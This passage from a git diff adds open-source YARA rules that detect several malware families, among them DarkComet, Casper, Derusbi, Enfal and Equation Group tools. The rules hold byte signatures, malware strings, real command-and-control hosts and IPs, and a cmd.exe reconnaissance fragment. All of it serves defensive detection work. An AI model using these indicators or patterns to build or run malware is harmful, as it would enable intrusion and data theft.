+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bolonyokte : rat
+{
+ meta:
+ description = "UnknownDotNet RAT - Bolonyokte"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-02-01"
+ filetype = "memory"
+ version = "1.0"
+
+ strings:
+ $campaign1 = "Bolonyokte" ascii wide
+ $campaign2 = "donadoni" ascii wide
+
+ $decoy1 = "nyse.com" ascii wide
+ $decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
+ $decoy3 = "bf13-5d45cb40" ascii wide
+
+ $artifact1 = "Backup.zip" ascii wide
+ $artifact2 = "updates.txt" ascii wide
+ $artifact3 = "vdirs.dat" ascii wide
+ $artifact4 = "default.dat"
+ $artifact5 = "index.html"
+ $artifact6 = "mime.dat"
+
+ $func1 = "FtpUrl"
+ $func2 = "ScreenCapture"
+ $func3 = "CaptureMouse"
+ $func4 = "UploadFile"
+
+ $ebanking1 = "Internet Banking" wide
+ $ebanking2 = "(Online Banking)|(Online banking)"
+ $ebanking3 = "(e-banking)|(e-Banking)" nocase
+ $ebanking4 = "login"
+ $ebanking5 = "en ligne" wide
+ $ebanking6 = "bancaires" wide
+ $ebanking7 = "(eBanking)|(Ebanking)" wide
+ $ebanking8 = "Anmeldung" wide
+ $ebanking9 = "internet banking" nocase wide
+ $ebanking10 = "Banking Online" nocase wide
+ $ebanking11 = "Web Banking" wide
+ $ebanking12 = "Power"
+
+ condition:
+ any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
+}
diff --git a/malware/Boouset.yar b/malware/Boouset.yar
new file mode 100644
index 0000000..fb71edd
--- /dev/null
+++ b/malware/Boouset.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BoousetCode : Boouset Family
+{
+ meta:
+ description = "Boouset code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
+
+ condition:
+ any of them
+}
+
diff --git a/malware/Bublik_downloader.yar b/malware/Bublik_downloader.yar
new file mode 100644
index 0000000..8427b8f
--- /dev/null
+++ b/malware/Bublik_downloader.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bublik : Downloader
+{
+ meta:
+ author="Kevin Falcoz"
+ date="29/09/2013"
+ description="Bublik Trojan Downloader"
+
+ strings:
+ $signature1={63 6F 6E 73 6F 6C 61 73}
+ $signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69}
+
+ condition:
+ $signature1 and $signature2
+}
diff --git a/malware/Casper.yar b/malware/Casper.yar
new file mode 100644
index 0000000..5a0e9f0
--- /dev/null
+++ b/malware/Casper.yar
@@ -0,0 +1,101 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Casper_Backdoor_x86 {
+ meta:
+ description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+ author = "Florian Roth"
+ reference = "http://goo.gl/VRJNLo"
+ date = "2015/03/05"
+ hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+ score = 80
+ strings:
+ $s1 = "\"svchost.exe\"" fullword wide
+ $s2 = "firefox.exe" fullword ascii
+ $s3 = "\"Host Process for Windows Services\"" fullword wide
+
+ $x1 = "\\Users\\*" fullword ascii
+ $x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+ $x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+ $x4 = "\\Documents and Settings\\*" fullword ascii
+
+ $y1 = "%s; %S=%S" fullword wide
+ $y2 = "%s; %s=%s" fullword ascii
+ $y3 = "Cookie: %s=%s" fullword ascii
+ $y4 = "http://%S:%d" fullword wide
+
+ $z1 = "http://google.com/" fullword ascii
+ $z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+ $z3 = "Operating System\"" fullword wide
+ condition:
+ ( all of ($s*) ) or
+ ( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
+}
+
+rule Casper_EXE_Dropper {
+ meta:
+ description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+ author = "Florian Roth"
+ reference = "http://goo.gl/VRJNLo"
+ date = "2015/03/05"
+ hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+ score = 80
+ strings:
+ $s0 = "<Command>" fullword ascii
+ $s1 = "</Command>" fullword ascii
+ $s2 = "\" /d \"" fullword ascii
+ $s4 = "'%s' %s" fullword ascii
+ $s5 = "nKERNEL32.DLL" fullword wide
+ $s6 = "@ReturnValue" fullword wide
+ $s7 = "ID: 0x%x" fullword ascii
+ $s8 = "Name: %S" fullword ascii
+ condition:
+ 7 of them
+}
+
+rule Casper_Included_Strings {
+ meta:
+ description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+ author = "Florian Roth"
+ reference = "http://goo.gl/VRJNLo"
+ date = "2015/03/06"
+ score = 50
+ strings:
+ $a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+ $a1 = "& SYSTEMINFO) ELSE EXIT"
+
+ $mz = { 4d 5a }
+ $c1 = "domcommon.exe" wide fullword // File Name
+ $c2 = "jpic.gov.sy" fullword // C2 Server
+ $c3 = "aiomgr.exe" wide fullword // File Name
+ $c4 = "perfaudio.dat" fullword // Temp File Name
+ $c5 = "Casper_DLL.dll" fullword // Name
+ $c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } // Decryption Key
+ $c7 = "{4216567A-4512-9825-7745F856}" fullword // Mutex
+ condition:
+ all of ($a*) or
+ ( $mz at 0 ) and ( 1 of ($c*) )
+}
+
+rule Casper_SystemInformation_Output {
+ meta:
+ description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+ author = "Florian Roth"
+ reference = "http://goo.gl/VRJNLo"
+ date = "2015/03/06"
+ score = 70
+ strings:
+ $a0 = "***** SYSTEM INFORMATION ******"
+ $a1 = "***** SECURITY INFORMATION ******"
+ $a2 = "Antivirus: "
+ $a3 = "Firewall: "
+ $a4 = "***** EXECUTION CONTEXT ******"
+ $a5 = "Identity: "
+ $a6 = "<CONFIG TIMESTAMP="
+ condition:
+ all of them
+}
diff --git a/malware/Cerberus.yar b/malware/Cerberus.yar
new file mode 100644
index 0000000..5ee19a9
--- /dev/null
+++ b/malware/Cerberus.yar
@@ -0,0 +1,25 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Cerberus : rat
+{
+ meta:
+ description = "Cerberus"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-01-12"
+ filetype = "memory"
+ version = "1.0"
+
+ strings:
+ $checkin = "Ypmw1Syv023QZD"
+ $clientpong = "wZ2pla"
+ $serverping = "wBmpf3Pb7RJe"
+ $generic = "cerberus" nocase
+
+ condition:
+ any of them
+}
diff --git a/malware/Cookies.yar b/malware/Cookies.yar
new file mode 100644
index 0000000..2cebc27
--- /dev/null
+++ b/malware/Cookies.yar
@@ -0,0 +1,46 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CookiesStrings : Cookies Family
+{
+ meta:
+ description = "Cookies Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-20"
+
+ strings:
+ $zip1 = "ntdll.exePK"
+ $zip2 = "AcroRd32.exePK"
+ $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
+ $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
+ $exe1 = "Leave GetCommand!"
+ $exe2 = "perform exe success!"
+ $exe3 = "perform exe failure!"
+ $exe4 = "Entry SendCommandReq!"
+ $exe5 = "Reqfile not exist!"
+ $exe6 = "LeaveDealUpfile!"
+ $exe7 = "Entry PostData!"
+ $exe8 = "Leave PostFile!"
+ $exe9 = "Entry PostFile!"
+ $exe10 = "\\unknow.zip" wide ascii
+ $exe11 = "the url no respon!"
+
+ condition:
+ (2 of ($zip*)) or (2 of ($exe*))
+}
+
+rule Cookies : Family
+{
+ meta:
+ description = "Cookies"
+ author = "Seth Hardy"
+ last_modified = "2014-06-20"
+
+ condition:
+ CookiesStrings
+}
+
diff --git a/malware/DarkComet.yar b/malware/DarkComet.yar
new file mode 100644
index 0000000..5a19a74
--- /dev/null
+++ b/malware/DarkComet.yar
@@ -0,0 +1,61 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule DarkComet_2
+{
+ meta:
+ description = "DarkComet RAT"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $bot1 = /(#)BOT#OpenUrl/ wide ascii
+ $bot2 = /(#)BOT#Ping/ wide ascii
+ $bot3 = /(#)BOT#RunPrompt/ wide ascii
+ $bot4 = /(#)BOT#SvrUninstall/ wide ascii
+ $bot5 = /(#)BOT#URLDownload/ wide ascii
+ $bot6 = /(#)BOT#URLUpdate/ wide ascii
+ $bot7 = /(#)BOT#VisitUrl/ wide ascii
+ $bot8 = /(#)BOT#CloseServer/ wide ascii
+
+ $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
+ $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
+ $ddos3 = /(D)DOSUDPFLOOD/ wide ascii
+
+ $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
+ $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
+ $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
+ $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii
+
+ $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
+ $shell2 = /(S)UBMREMOTESHELL/ wide ascii
+ $shell3 = /(K)ILLREMOTESHELL/ wide ascii
+
+ condition:
+ 4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
+}
+
+rule DarkComet : rat
+{
+ meta:
+ description = "DarkComet"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-01-12"
+ filetype = "memory"
+ version = "1.0"
+
+ strings:
+ $a = "#BEGIN DARKCOMET DATA --"
+ $b = "#EOF DARKCOMET DATA --"
+ $c = "DC_MUTEX-"
+ $k1 = "#KCMDDC5#-890"
+ $k2 = "#KCMDDC51#-890"
+
+ condition:
+ any of them
+}
+
+
diff --git a/malware/Derusbi.yar b/malware/Derusbi.yar
new file mode 100644
index 0000000..2b25050
--- /dev/null
+++ b/malware/Derusbi.yar
@@ -0,0 +1,61 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Trojan_Derusbi {
+ meta:
+ Author = "RSA_IR"
+ Date = "4Sept13"
+ File = "derusbi_variants v 1.3"
+ MD5 = " c0d4c5b669cc5b51862db37e972d31ec "
+
+ strings:
+ $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??}
+ $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E}
+ $b3 = {4E E6 40 BB}
+ $b4 = {B1 19 BF 44}
+ $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D}
+ $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E}
+ $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3}
+ $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F}
+
+ condition:
+ 2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
+}
+
+rule APT_Derusbi_DeepPanda
+{
+meta:
+ author = "ThreatConnect Intelligence Research Team"
+ reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
+strings:
+ $D = "Dom4!nUserP4ss" wide ascii
+condition:
+ $D
+}
+
+
+rule APT_Derusbi_Gen
+{
+meta:
+ author = "ThreatConnect Intelligence Research Team"
+strings:
+ $2 = "273ce6-b29f-90d618c0" wide ascii
+ $A = "Ace123dx" fullword wide ascii
+ $A1 = "Ace123dxl!" fullword wide ascii
+ $A2 = "Ace123dx!@#x" fullword wide ascii
+ $C = "/Catelog/login1.asp" wide ascii
+ $DF = "~DFTMP$$$$$.1" wide ascii
+ $G = "GET /Query.asp?loginid=" wide ascii
+ $L = "LoadConfigFromReg failded" wide ascii
+ $L1 = "LoadConfigFromBuildin success" wide ascii
+ $ph = "/photoe/photo.asp HTTP" wide ascii
+ $PO = "POST /photos/photo.asp" wide ascii
+ $PC = "PCC_IDENT" wide ascii
+condition:
+ any of them
+}
+
diff --git a/malware/Dexter.yar b/malware/Dexter.yar
new file mode 100644
index 0000000..0aa655e
--- /dev/null
+++ b/malware/Dexter.yar
@@ -0,0 +1,22 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dexter_Malware {
+ meta:
+ description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+ author = "Florian Roth"
+ reference = "http://goo.gl/oBvy8b"
+ date = "2015/02/10"
+ score = 70
+ strings:
+ $s0 = "Java Security Plugin" fullword wide
+ $s1 = "%s\\%s\\%s.exe" fullword wide
+ $s2 = "Sun Java Security Plugin" fullword wide
+ $s3 = "\\Internet Explorer\\iexplore.exe" fullword wide
+ condition:
+ all of them
+}
diff --git a/malware/Dridex.yar b/malware/Dridex.yar
new file mode 100644
index 0000000..b978b70
--- /dev/null
+++ b/malware/Dridex.yar
@@ -0,0 +1,29 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dridex_Trojan_XML {
+ meta:
+ description = "Dridex Malware in XML Document"
+ author = "Florian Roth @4nc4p"
+ reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+ date = "2015/03/08"
+ hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+ hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+ hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+ hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+ hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
+ strings:
+ // can be ascii or wide formatted - therefore no restriction
+ $c_xml = "<?xml version="
+ $c_word = "<?mso-application progid=\"Word.Document\"?>"
+ $c_macro = "w:macrosPresent=\"yes\""
+ $c_binary = "<w:binData w:name="
+ $c_0_chars = "<o:Characters>0</o:Characters>"
+ $c_1_line = "<o:Lines>1</o:Lines>"
+ condition:
+ all of ($c*)
+}
diff --git a/malware/Enfal.yar b/malware/Enfal.yar
new file mode 100644
index 0000000..2923587
--- /dev/null
+++ b/malware/Enfal.yar
@@ -0,0 +1,132 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EnfalCode : Enfal Family
+{
+ meta:
+ description = "Enfal code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
+ $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
+
+ condition:
+ any of them
+}
+
+rule EnfalStrings : Enfal Family
+{
+ meta:
+ description = "Enfal Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
+ $ = "e:\\programs\\LuridDownLoader"
+ $ = "LuridDownloader for Falcon"
+ $ = "DllServiceTrojan"
+ $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
+ $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
+ $ = "Madonna\x00Jesus"
+ $ = "/iupw82/netstate"
+ $ = "fuckNodAgain"
+ $ = "iloudermao"
+ $ = "Crpq2.cgi"
+ $ = "Clnpp5.cgi"
+ $ = "Dqpq3ll.cgi"
+ $ = "dieosn83.cgi"
+ $ = "Rwpq1.cgi"
+ $ = "/Ccmwhite"
+ $ = "/Cmwhite"
+ $ = "/Crpwhite"
+ $ = "/Dfwhite"
+ $ = "/Query.txt"
+ $ = "/Ufwhite"
+ $ = "/cgl-bin/Clnpp5.cgi"
+ $ = "/cgl-bin/Crpq2.cgi"
+ $ = "/cgl-bin/Dwpq3ll.cgi"
+ $ = "/cgl-bin/Owpq4.cgi"
+ $ = "/cgl-bin/Rwpq1.cgi"
+ $ = "/trandocs/mm/"
+ $ = "/trandocs/netstat"
+ $ = "NFal.exe"
+ $ = "LINLINVMAN"
+ $ = "7NFP4R9W"
+
+ condition:
+ any of them
+}
+
+rule Enfal : Family
+{
+ meta:
+ description = "Enfal"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ condition:
+ EnfalCode or EnfalStrings
+}
+
+
+rule Enfal_Malware {
+ meta:
+ description = "Detects a certain type of Enfal Malware"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/02/10"
+ hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
+ score = 60
+ strings:
+ $s0 = "POWERPNT.exe" fullword ascii
+ $s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
+ $s2 = "%HOMEPATH%" fullword ascii
+ $s3 = "Server2008" fullword ascii
+ $s4 = "Server2003" fullword ascii
+ $s5 = "Server2003R2" fullword ascii
+ $s6 = "Server2008R2" fullword ascii
+ $s9 = "%HOMEDRIVE%" fullword ascii
+ $s13 = "%ComSpec%" fullword ascii
+ condition:
+ all of them
+}
+
+rule Enfal_Malware_Backdoor {
+ meta:
+ description = "Generic Rule to detect the Enfal Malware"
+ author = "Florian Roth"
+ date = "2015/02/10"
+ super_rule = 1
+ hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+ hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+ hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
+ score = 60
+ strings:
+ $mz = { 4d 5a }
+
+ $x1 = "Micorsoft Corportation" fullword wide
+ $x2 = "IM Monnitor Service" fullword wide
+
+ $s1 = "imemonsvc.dll" fullword wide
+ $s2 = "iphlpsvc.tmp" fullword
+
+ $z1 = "urlmon" fullword
+ $z2 = "Registered trademarks and service marks are the property of their respec" wide
+ $z3 = "XpsUnregisterServer" fullword
+ $z4 = "XpsRegisterServer" fullword
+ $z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+ condition:
+ ( $mz at 0 ) and
+ (
+ 1 of ($x*) or
+ ( all of ($s*) and all of ($z*) )
+ )
+}
+
diff --git a/malware/Equation.yar b/malware/Equation.yar
new file mode 100644
index 0000000..f9164fb
--- /dev/null
+++ b/malware/Equation.yar
@@ -0,0 +1,573 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+
+
+/* Equation APT ------------------------------------------------------------ */
+
+rule apt_equation_exploitlib_mutexes {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+ version = "1.0"
+ last_modified = "2015-02-16"
+ reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+ strings:
+ $mz="MZ"
+ $a1="prkMtx" wide
+ $a2="cnFormSyncExFBC" wide
+ $a3="cnFormVoidFBC" wide
+ $a4="cnFormSyncExFBC"
+ $a5="cnFormVoidFBC"
+ condition:
+ (($mz at 0) and any of ($a*))
+}
+
+rule apt_equation_doublefantasy_genericresource {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
+ version = "1.0"
+ last_modified = "2015-02-16"
+ reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+ strings:
+ $mz="MZ"
+ $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
+ $a2="yyyyyyyyyyyyyyyy"
+ $a3="002"
+ condition:
+ (($mz at 0) and all of ($a*)) and filesize < 500000
+}
+
+rule apt_equation_equationlaser_runtimeclasses {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect the EquationLaser malware"
+ version = "1.0"
+ last_modified = "2015-02-16"
+ reference = "https://securelist.com/blog/"
+ strings:
+ $a1="?a73957838_2@@YAXXZ"
+ $a2="?a84884@@YAXXZ"
+ $a3="?b823838_9839@@YAXXZ"
+ $a4="?e747383_94@@YAXXZ"
+ $a5="?e83834@@YAXXZ"
+ $a6="?e929348_827@@YAXXZ"
+ condition:
+ any of them
+}
+
+rule apt_equation_cryptotable {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect the crypto library used in Equation group malware"
+ version = "1.0"
+ last_modified = "2015-02-16"
+ reference = "https://securelist.com/blog/"
+ strings:
+ $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+ condition:
+ $a
+}
+
+/* Equation Group - Kaspersky ---------------------------------------------- */
+
+rule Equation_Kaspersky_TripleFantasy_1 {
+ meta:
+ description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+ strings:
+ $mz = { 4d 5a }
+
+ $s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+ $s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+ $s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
+ $s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+ $s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+ $s5 = "Chrome" fullword wide
+ $s6 = "StringIndex" fullword ascii
+
+ $x1 = "itemagic.net@443" fullword wide
+ $x2 = "team4heat.net@443" fullword wide
+ $x5 = "62.216.152.69@443" fullword wide
+ $x6 = "84.233.205.37@443" fullword wide
+
+ $z1 = "www.microsoft.com@80" fullword wide
+ $z2 = "www.google.com@80" fullword wide
+ $z3 = "127.0.0.1:3128" fullword wide
+ condition:
+ ( $mz at 0 ) and filesize < 300000 and
+ (
+ ( all of ($s*) and all of ($z*) ) or
+ ( all of ($s*) and 1 of ($x*) )
+ )
+}
+
+rule Equation_Kaspersky_DoubleFantasy_1 {
+ meta:
+ description = "Equation Group Malware - DoubleFantasy"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+ strings:
+ $mz = { 4d 5a }
+
+ $z1 = "msvcp5%d.dll" fullword ascii
+
+ $s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+ $s3 = "actxprxy.DllGetClassObject" fullword ascii
+ $s5 = "actxprxy.DllRegisterServer" fullword ascii
+ $s6 = "actxprxy.DllUnregisterServer" fullword ascii
+
+ $x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
+ $x2 = "191H1a1" fullword ascii
+ $x3 = "November " fullword ascii
+ $x4 = "abababababab" fullword ascii
+ $x5 = "January " fullword ascii
+ $x6 = "October " fullword ascii
+ $x7 = "September " fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 350000 and
+ (
+ ( $z1 ) or
+ ( all of ($s*) and 6 of ($x*) )
+ )
+}
+
+rule Equation_Kaspersky_GROK_Keylogger {
+ meta:
+ description = "Equation Group Malware - GROK keylogger"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "c:\\users\\rmgree5\\" ascii
+ $s1 = "msrtdv.sys" fullword wide
+
+ $x1 = "svrg.pdb" fullword ascii
+ $x2 = "W32pServiceTable" fullword ascii
+ $x3 = "In forma" fullword ascii
+ $x4 = "ReleaseF" fullword ascii
+ $x5 = "criptor" fullword ascii
+ $x6 = "astMutex" fullword ascii
+ $x7 = "ARASATAU" fullword ascii
+ $x8 = "R0omp4ar" fullword ascii
+
+ $z1 = "H.text" fullword ascii
+ $z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+ $z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+ condition:
+ ( $mz at 0 ) and filesize < 250000 and
+ (
+ $s0 or
+ ( $s1 and 6 of ($x*) ) or
+ ( 6 of ($x*) and all of ($z*) )
+ )
+}
+
+rule Equation_Kaspersky_GreyFishInstaller {
+ meta:
+ description = "Equation Group Malware - Grey Fish"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+ strings:
+ $s0 = "DOGROUND.exe" fullword wide
+ $s1 = "Windows Configuration Services" fullword wide
+ $s2 = "GetMappedFilenameW" fullword ascii
+ condition:
+ all of them
+}
+
+rule Equation_Kaspersky_EquationDrugInstaller {
+ meta:
+ description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+ strings:
+ $mz = { 4d 5a }
+
+ $s0 = "\\system32\\win32k.sys" fullword wide
+ $s1 = "ALL_FIREWALLS" fullword ascii
+
+ $x1 = "@prkMtx" fullword wide
+ $x2 = "STATIC" fullword wide
+ $x3 = "windir" fullword wide
+ $x4 = "cnFormVoidFBC" fullword wide
+ $x5 = "CcnFormSyncExFBC" fullword wide
+ $x6 = "WinStaObj" fullword wide
+ $x7 = "BINRES" fullword wide
+ condition:
+ ( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
+}
+
+rule Equation_Kaspersky_EquationLaserInstaller {
+ meta:
+ description = "Equation Group Malware - EquationLaser Installer"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "Failed to get Windows version" fullword ascii
+ $s1 = "lsasrv32.dll and lsass.exe" fullword wide
+ $s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+ $s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+ $s4 = "lsasrv32.dll" fullword ascii
+ $s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii
+ $s6 = "%s %02x %s" fullword ascii
+ $s7 = "VIEWERS" fullword ascii
+ $s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+ condition:
+ ( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
+}
+
+rule Equation_Kaspersky_FannyWorm {
+ meta:
+ description = "Equation Group Malware - Fanny Worm"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+ strings:
+ $mz = { 4d 5a }
+
